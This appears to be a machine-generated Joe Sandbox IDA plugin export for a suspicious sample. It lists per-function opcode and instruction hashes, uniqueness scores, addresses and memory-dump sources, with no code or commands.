Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9c9cab26e1a450695be0868467f3fee90a3d339aa2524fcf6ec1e0897de24f60
Instruction ID: 91ff250283a95306c31d1b330711ba2f3c92cc8640b585d5313e1124b3173cbd
Opcode Fuzzy Hash: 9c9cab26e1a450695be0868467f3fee90a3d339aa2524fcf6ec1e0897de24f60
Instruction Fuzzy Hash: 72E06DB1E0A450AFD703DA30C901BC977B6EB142C6FF82561821292156F2310C428FC4

Uniqueness

Uniqueness Score: -1.00%

Function 0061D428 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c36fea3816fcd436a036e13169980b572448950300c8e80ebd4c719bacd8bb37
Instruction ID: 83bd4156e9bbe92dee33e301d60a88263e99394e7ed6b692f2a343d806e31548
Opcode Fuzzy Hash: c36fea3816fcd436a036e13169980b572448950300c8e80ebd4c719bacd8bb37
Instruction Fuzzy Hash: 1BE0B63104E285CFC7595BB5A9290B4BF71BD6130671D828BE447C5862C73528CAFB62

Uniqueness

Uniqueness Score: -1.00%

Function 006196A1 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f57e8bfd9ed8b79a90e6edb66416e9caec129a20bc5fe3a9db9f9b6a653b6a8
Instruction ID: dd259c0fb2ae73ce9fa64707af37e4085399109273c3ad2ec2eb2b6ff62c1790
Opcode Fuzzy Hash: 4f57e8bfd9ed8b79a90e6edb66416e9caec129a20bc5fe3a9db9f9b6a653b6a8
Instruction Fuzzy Hash: FEE086323052145FEB055A65C8163F237A69B42711F148263B1518E2DACD2946865771

Uniqueness

Uniqueness Score: -1.00%

Function 006086D2 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.419705833.0000000000600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_600000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8196ebf17976b79b67c801a3112fc5a8404a28e2595eaec615c0310a6234fe29
Instruction ID: fa522109402c2003f84e68fb6ce42c743cbcfd9b82927a0fca66e9daf88d6a12
Opcode Fuzzy Hash: 8196ebf17976b79b67c801a3112fc5a8404a28e2595eaec615c0310a6234fe29
Instruction Fuzzy Hash: 6DE04F3158E3906EC72286601C11FD63F644B12660F1A419BEA45EF692C26598448791

Uniqueness

Uniqueness Score: -1.00%

Function 004F56BE Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.419429408.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4f0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3a58d0bc0aa87a61e369baa5a660f17c43113cae646de3eba7b07d69f8784fdb
Instruction ID: 2e4c0567fd4032964e8fbf548679c2cafe1a7bee7a939a656baafe6b6ed5dabe
Opcode Fuzzy Hash: 3a58d0bc0aa87a61e369baa5a660f17c43113cae646de3eba7b07d69f8784fdb
Instruction Fuzzy Hash: 0EE0ED39A04619CBDB20DA05D540BBAB7F1FB90310F258097DB59A7710E7389D519F86

Uniqueness

Uniqueness Score: -1.00%

Function 007DAA68 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.420080510.00000000007D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 007D0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7d0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 32efcab49229efa625e495e1ef2bbba7152c96d1cb3412967616df7a5a4de928
Instruction ID: e0eae075574b62ff6f6b5a68438f7917f4d63db171c7398f17ba1f98b3fae2b0
Opcode Fuzzy Hash: 32efcab49229efa625e495e1ef2bbba7152c96d1cb3412967616df7a5a4de928
Instruction Fuzzy Hash: B2E08630A0522CDBCB248A14CC157AB7B79EBC6750F11087B951667384DBB51C08EBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00616690 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d820da00b828c77f43388c91a5544137b87bb1430c3ac0cbd094fd0bd6b66f6b
Instruction ID: 743275f79a780d95a1c0ad46b12e9be70e31ef1e308b57c19d7a16c428960d92
Opcode Fuzzy Hash: d820da00b828c77f43388c91a5544137b87bb1430c3ac0cbd094fd0bd6b66f6b
Instruction Fuzzy Hash: 79D0123124D1805FC305C7A8DC91D657BF59F8B10431884EEE449C76A3D515EC13C620

Uniqueness

Uniqueness Score: -1.00%

Function 0061C760 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 39f5c4a8261fd0ef7de0834794d00e6a74cecc2ed14f5ef49430e5f621b002d1
Instruction ID: 124843c08d7499268329b490b7fa37c0400b441b7c796f67d20c3a0a50914bc0
Opcode Fuzzy Hash: 39f5c4a8261fd0ef7de0834794d00e6a74cecc2ed14f5ef49430e5f621b002d1
Instruction Fuzzy Hash: B6E0C23264C2C08FC302C360D8A25947FA1DA5321030C81EEC088CF292CB22A40ACA11

Uniqueness

Uniqueness Score: -1.00%

Function 00617739 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ca7819e310e75a3c20a2c175768857bfa52c96fdb284f18e9eaee9b431ecdbbd
Instruction ID: 34bfd88b83796394928823efed028051bd4056d052a3830a378b8272e4f00f01
Opcode Fuzzy Hash: ca7819e310e75a3c20a2c175768857bfa52c96fdb284f18e9eaee9b431ecdbbd
Instruction Fuzzy Hash: F8E04F35109290AFC701CB64D8518A5BF74EF8721030CC1CBD8458B253C6719C15CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0061ABB8 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4af4d59ea1fa63ce4999dd18e730d46a9b00ff3fc0eee2feb2d78878d4f463c6
Instruction ID: 90121d5a39c6f1730867d6bb6deff02ea6154f2d24e4691469cb98dc68d81bf8
Opcode Fuzzy Hash: 4af4d59ea1fa63ce4999dd18e730d46a9b00ff3fc0eee2feb2d78878d4f463c6
Instruction Fuzzy Hash: 50E0123160C5885FC345CBB8D891D55BFB1DF9725031C829ED859CB262EA32E816CB20

Uniqueness

Uniqueness Score: -1.00%

Function 00617E58 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 10db89b43ca67acf3825c5471f7d81cac5ed160eb250f2de9cf811a1e5caf0ff
Instruction ID: 6ff78680100bb46f642325ce99863b5f40cb2788f86183232b79063f5286344d
Opcode Fuzzy Hash: 10db89b43ca67acf3825c5471f7d81cac5ed160eb250f2de9cf811a1e5caf0ff
Instruction Fuzzy Hash: 72E0C23220E3C06ED30397246C60AB27FB69F97200B0D40CED0C28B196C6215B46DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00618FB0 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9654b37766c282164e7142542b889f681f065a517cb30fdce9aca2447c1ea1cf
Instruction ID: 625ca6f14819948a4df034ffa9b5102289451def6860149383884c18bfb9d645
Opcode Fuzzy Hash: 9654b37766c282164e7142542b889f681f065a517cb30fdce9aca2447c1ea1cf
Instruction Fuzzy Hash: D6E0C23120D3C45FC341CA34DC61965BFB08F97214328C0AFD888CB253D622D802C712

Uniqueness

Uniqueness Score: -1.00%

Function 006111E0 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d89b3716c74d9cf0fcb8797a9899749802edf825f69ff9a3321255c9bef20389
Instruction ID: 58795aabbd1c9055d21088f5f7f784072169dc554d6f81d34b461ea8574fca87
Opcode Fuzzy Hash: d89b3716c74d9cf0fcb8797a9899749802edf825f69ff9a3321255c9bef20389
Instruction Fuzzy Hash: 82D05E3508D3C49FC3038BA8E864CC47FB0AE1A22031A42DBE484CB573C2698849CB21

Uniqueness

Uniqueness Score: -1.00%

Function 00618E80 Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f5135d65850c0ecb2f0c9348c0f5826fbdcea990565f9df1cfec73994495f4d7
Instruction ID: fb6e8c5862bbe7674f177f244ee9b2d3119cb169d356fcffdcc5c90e045939d7
Opcode Fuzzy Hash: f5135d65850c0ecb2f0c9348c0f5826fbdcea990565f9df1cfec73994495f4d7
Instruction Fuzzy Hash: 42D05B31A40F244BD338DB57A40459BB7DB5FC8621F49C53FD40A47A50DF7859858BC4

Uniqueness

Uniqueness Score: -1.00%

Function 0061D400 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3dd0454e047ddc007a395b1df74c6e9649e4b0205208c712bb44f104f56df38
Instruction ID: 67a2d2ff66865a7c8960d24266cb9b7842bb14e432d21737e40064fe7d93e274
Opcode Fuzzy Hash: a3dd0454e047ddc007a395b1df74c6e9649e4b0205208c712bb44f104f56df38
Instruction Fuzzy Hash: 77E0E23524A384AFD3028A68CC16F517F74EF16B00F5900DAE2408F1E3D26AA828CB96

Uniqueness

Uniqueness Score: -1.00%

Function 00617511 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2650d08365391e9194383ebb33f70006e789dbff80d30b456cffe8cd0b1fa578
Instruction ID: 07046f58da405debc9a3125b6eefdb1d5cb5ffc0c430531d33a5418d1f339237
Opcode Fuzzy Hash: 2650d08365391e9194383ebb33f70006e789dbff80d30b456cffe8cd0b1fa578
Instruction Fuzzy Hash: FED0177424D2846FD306C6689C608A5BFB59EDA210318C19EE849CB653D5229D16C620

Uniqueness

Uniqueness Score: -1.00%

Function 0061969E Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 28c3e658da4aae9e39f3f30aa5c0d79b48b98e4f7d62dee6ebb053f7896d304f
Instruction ID: cd64e5b3db6d4dda15c8f8d8ceecd26f8b63dd039b9aa8438ff9199537359309
Opcode Fuzzy Hash: 28c3e658da4aae9e39f3f30aa5c0d79b48b98e4f7d62dee6ebb053f7896d304f
Instruction Fuzzy Hash: D5D0A7713092145FFB045EB6C8113F631D79F81711F28C23271A28B3D9C92999C763B1

Uniqueness

Uniqueness Score: -1.00%

Function 0061498F Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8012b9dabde586428f154704a2fd7cdb5aaf92b946ea07d5b62803a2b8d8237c
Instruction ID: 60af4499e59234b7360fecfe49f41300d23ec56289ab36d5d936e98909327e1e
Opcode Fuzzy Hash: 8012b9dabde586428f154704a2fd7cdb5aaf92b946ea07d5b62803a2b8d8237c
Instruction Fuzzy Hash: CBD012771CA3C06FD302CA6099B15C0BFF99E8212431AC8DBD458CB163C65F990BCB15

Uniqueness

Uniqueness Score: -1.00%

Function 0060ECC8 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.419705833.0000000000600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_600000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c2f29ff207880cc64355d4536e0cbacb8b5a4586625952379d6895b3a3b969f
Instruction ID: 4f3968848e30389e0bafcd0da0023943da3f709e8da1aeca4388cf253cb33731
Opcode Fuzzy Hash: 7c2f29ff207880cc64355d4536e0cbacb8b5a4586625952379d6895b3a3b969f
Instruction Fuzzy Hash: 6AD09E7508D2846FC7028B78E864CD57FB0DE5A23031645D7E585CB573C26A489ACB12

Uniqueness

Uniqueness Score: -1.00%

Function 004F575F Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.419429408.00000000004F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 004F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4f0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 985dc8b434edb674436ba2f5d964100bd06185be5fba671075e55d7b3985e2ba
Instruction ID: 665107a6948f13d045154be553eea2f5160f4d4ff38ffed385bfc9f1518a8c60
Opcode Fuzzy Hash: 985dc8b434edb674436ba2f5d964100bd06185be5fba671075e55d7b3985e2ba
Instruction Fuzzy Hash: 3CE0EC39A04619CBCB20EA45D5407BAB7F1FB50360F258097CB45A7600E3389D518B86

Uniqueness

Uniqueness Score: -1.00%

Function 00616250 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 036e6ea297d7c8fc8c6b09d7f22efe5191a702715e244e691fb543930df8a9cf
Instruction ID: 1662bee522bd7c2680cb63d39b48510d7d7f5f61d5e4f8c7187f93216f5e20e3
Opcode Fuzzy Hash: 036e6ea297d7c8fc8c6b09d7f22efe5191a702715e244e691fb543930df8a9cf
Instruction Fuzzy Hash: C6D05E3100C2805FC312CBA8E8A2A967BB89E4721430880DED468CB562CA269807CE20

Uniqueness

Uniqueness Score: -1.00%

Function 0061A330 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c9f117d8b36bf302df39f91ceaf5fdce5f7e0f25e7d7c7de09801488c75b54a8
Instruction ID: d91a3e9578fcc374070858fbd06ba79da9547b2cfb8ab31d17ab365d2e7f2e30
Opcode Fuzzy Hash: c9f117d8b36bf302df39f91ceaf5fdce5f7e0f25e7d7c7de09801488c75b54a8
Instruction Fuzzy Hash: 04D05E3650C2C04FC306C7B8E4D19147FB09E4B11831C80EEC05ACF263CA269407CB11

Uniqueness

Uniqueness Score: -1.00%

Function 0061A480 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 44ba782675fcdd8aff74ea6f0a83c41e2cb3e78684efea51cd70aa7f2296677b
Instruction ID: 877f0f7dcd895513f3842dead994786ff947c22c1e70ab8d1161cd6d10d093a9
Opcode Fuzzy Hash: 44ba782675fcdd8aff74ea6f0a83c41e2cb3e78684efea51cd70aa7f2296677b
Instruction Fuzzy Hash: 04D09E36200118BF9B05DE84DC41CA6BB6AEB89660B14C45AFD1547351CAB3ED22DB90

Uniqueness

Uniqueness Score: -1.00%

Function 006177B0 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0363563aa19d633130a3835535bdd8dbe9402f0e4ed07d8d332adb26c21b56be
Instruction ID: f9c00ec6d1e5039e071c543747013b9be41756271007b2d68abe3bc501294ddd
Opcode Fuzzy Hash: 0363563aa19d633130a3835535bdd8dbe9402f0e4ed07d8d332adb26c21b56be
Instruction Fuzzy Hash: 78D05E3200C1804FD342C7A8E8D19647BA4DE4B20430844EED409CB162CA22A40BCB10

Uniqueness

Uniqueness Score: -1.00%

Function 006086E0 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.419705833.0000000000600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_600000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ff4776bb994999e9fd3c57d91b9f89e0bd9d1a82a3884650830a1546237c04a7
Instruction ID: 496d48bf9a49c8b9b9f2db38efd5c127ae4265b89ec6233f6027c4e3941ab3d3
Opcode Fuzzy Hash: ff4776bb994999e9fd3c57d91b9f89e0bd9d1a82a3884650830a1546237c04a7
Instruction Fuzzy Hash: 1CD0A932682324A7CA326954AC02F86770C9B22BA0F020022FF046F38086B2B84083D8

Uniqueness

Uniqueness Score: -1.00%

Function 04EF99A0 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.433650657.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4ee0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a2d1d792cedd9db5e0fdb2b91a3fe9ae95f3feb9bbe2a789ee941a78af227bd4
Instruction ID: 2684a6fd46c070e28b8cb8ae361625a847ecb0ee9f40ed1e58e4a11f5eff50f7
Opcode Fuzzy Hash: a2d1d792cedd9db5e0fdb2b91a3fe9ae95f3feb9bbe2a789ee941a78af227bd4
Instruction Fuzzy Hash: 99D0C97190220CAF8F10EFF5890289EBFF9EB05300B1041F6E6099B211EE729E1097D2

Uniqueness

Uniqueness Score: -1.00%

Function 04EF3D60 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.433650657.0000000004EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4ee0000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fc1b74b2fe464d2ed4ef3c8d3e1cf827001b76803f1fce1da54015c5d237a357
Instruction ID: b458c750a68fd197f538cbae62bd9648267a7e911edaea48e05c43a3321c2269
Opcode Fuzzy Hash: fc1b74b2fe464d2ed4ef3c8d3e1cf827001b76803f1fce1da54015c5d237a357
Instruction Fuzzy Hash: FED0C97190220CAB8F10EFF9890189EBFF9EB45300B1041B6A60997211EE729E1057D2

Uniqueness

Uniqueness Score: -1.00%

Function 00617180 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b87cd546cb3259efc90180df987cdcc7d932821919ef263d4245b814b2afcc3
Instruction ID: b5409cdb9300ab9dc11fef08927eb1b5b661bc3b5501d5699b261666bbb8fce6
Opcode Fuzzy Hash: 5b87cd546cb3259efc90180df987cdcc7d932821919ef263d4245b814b2afcc3
Instruction Fuzzy Hash: ECD09E3114D2C44FC346CA75A8519447F699E43614719C4EED458CB163DA26D91AC751

Uniqueness

Uniqueness Score: -1.00%

Function 00616331 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c5a62c43eed806ad35ca72436d40d93ae734011abfcee5960b89afcb0e749e06
Instruction ID: 4e62feeadbae3b86521456ee86a3ed7e209f28c8363187b3b81d10d8559f2816
Opcode Fuzzy Hash: c5a62c43eed806ad35ca72436d40d93ae734011abfcee5960b89afcb0e749e06
Instruction Fuzzy Hash: 1DD05E3044D2C05FC703C778D891945BFB0AE8321430E81EFD448CF663C626981ACB92

Uniqueness

Uniqueness Score: -1.00%

Function 0061A3A0 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 01121f2c778aaa955698064ff843d2996bee34fc2f5530b77e7ea5e79a423cb0
Instruction ID: 1b0a6f6d896694a697788613f5e5355b62e48349d74697ae87246d03dd23ea49
Opcode Fuzzy Hash: 01121f2c778aaa955698064ff843d2996bee34fc2f5530b77e7ea5e79a423cb0
Instruction Fuzzy Hash: 05D0C936200118BF9B04DE88DC41CAABB6EEB89660714C05FFD1887311CAB3ED22DBD0

Uniqueness

Uniqueness Score: -1.00%

Function 00619900 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6dba878b5a73eee3cef6f9b456bbc021bb7c1d8afdcf1d6b443403d76c538ccb
Instruction ID: 5e1e121f35641cc40f24ba64becc9b62de80893f07532284ae158a57632127f1
Opcode Fuzzy Hash: 6dba878b5a73eee3cef6f9b456bbc021bb7c1d8afdcf1d6b443403d76c538ccb
Instruction Fuzzy Hash: F0D0673510C2C56FD702D668F891B507BA8AF47208B1880DAD4588B552CA69A816C665

Uniqueness

Uniqueness Score: -1.00%

Function 00619DA0 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 452c3b34d3ce0ec5e86880214a8f69a30da4e2c211b21d6c63ebb2f5c3ea2d00
Instruction ID: a8f07239837ded97d0a2fac7f7eca2ffbb8b987193724f08d7dbd48af05ec8ca
Opcode Fuzzy Hash: 452c3b34d3ce0ec5e86880214a8f69a30da4e2c211b21d6c63ebb2f5c3ea2d00
Instruction Fuzzy Hash: 5ED05E3120CA845FC301C668C8518A6BFB18F9511471480AFE88AC7393D523ED16CA00

Uniqueness

Uniqueness Score: -1.00%

Function 0061AEB0 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a644845e73984d7060e4181c7bdb7c9135c7c073e82535d3cbd1391fa2f5751d
Instruction ID: 4bc3df595003ada9494e28eb0a5fcabee8e7e8e4f6f8a8ee4b9d5e901318ea92
Opcode Fuzzy Hash: a644845e73984d7060e4181c7bdb7c9135c7c073e82535d3cbd1391fa2f5751d
Instruction Fuzzy Hash: 45D0523904E2C80FC303C3B8A8A28647FB0DE4311431A80DFC488CF6A3CA62A80ECB51

Uniqueness

Uniqueness Score: -1.00%

Function 0061A410 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_610000_UGS - CRO REQ - KHIDUBAI (OPL-841724).jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0b476dc9fc3f697ac181155d6f9d98fe1d0e728bda10e3f1de2026883d710f41
Instruction ID: 399b19409b12bfee8db974d66aa2a96c1138129ff0f8d3e3c5f1b8eb92e7f6bb
Opcode Fuzzy Hash: 0b476dc9fc3f697ac181155d6f9d98fe1d0e728bda10e3f1de2026883d710f41
Instruction Fuzzy Hash: A2D012352001187F9704DA88D841CA6F76DEBC9670714C05BFC0887301CAB3ED12C7D0

Uniqueness

Uniqueness Score: -1.00%

Function 00617930 Relevance: .0, Instructions: 14COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.419757068.0000000000610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00610000, based on PE: false

Joe Sandbox IDA Plugin

